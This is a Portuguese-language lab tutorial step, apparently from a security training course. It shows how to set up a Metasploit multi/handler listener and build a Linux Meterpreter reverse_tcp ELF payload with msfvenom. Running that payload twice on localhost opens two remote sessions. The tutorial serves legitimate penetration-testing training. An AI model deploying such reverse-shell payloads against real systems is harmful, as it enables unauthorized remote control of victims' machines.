Obter múltiplas sessões Meterpreter ou shell
Nesta etapa, você configurará um listener no Metasploit e, em seguida, executará um payload para criar duas sessões Meterpreter separadas. Isso simula o acesso a dois sistemas diferentes.
Primeiro, abra um terminal e inicie o console do Metasploit Framework. O flag -q faz com que ele inicie silenciosamente, sem exibir o banner.
msfconsole -q
Em seguida, configuraremos um listener genérico, chamado multi/handler, para aguardar conexões de entrada.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
Agora, execute o listener como um job em segundo plano usando o flag -j. Isso mantém o prompt do msfconsole disponível para outros comandos enquanto o listener é executado em segundo plano.
run -j
Você deverá ver uma confirmação de que o handler foi iniciado.
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
Agora, você precisa gerar e executar o payload que se conectará a este listener. Abra uma nova aba de terminal, a segunda, clicando no ícone + na janela do terminal.
Neste novo terminal, use msfvenom para criar um payload. Este comando gera um arquivo executável ELF que, quando executado, se conectará de volta ao nosso listener.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
Torne o arquivo de payload gerado executável:
chmod +x ~/project/payload.elf
Agora, execute o payload duas vezes para criar duas sessões. Executamos como processos em segundo plano (&) para que você possa executar o comando novamente imediatamente.
./payload.elf &
./payload.elf &
Volte para a sua primeira janela de terminal com msfconsole. Você verá mensagens indicando que duas sessões Meterpreter foram abertas.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38998) at 2023-10-27 10:30:00 -0400
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:39000) at 2023-10-27 10:30:05 -0400
Você agora estabeleceu com sucesso duas sessões ativas.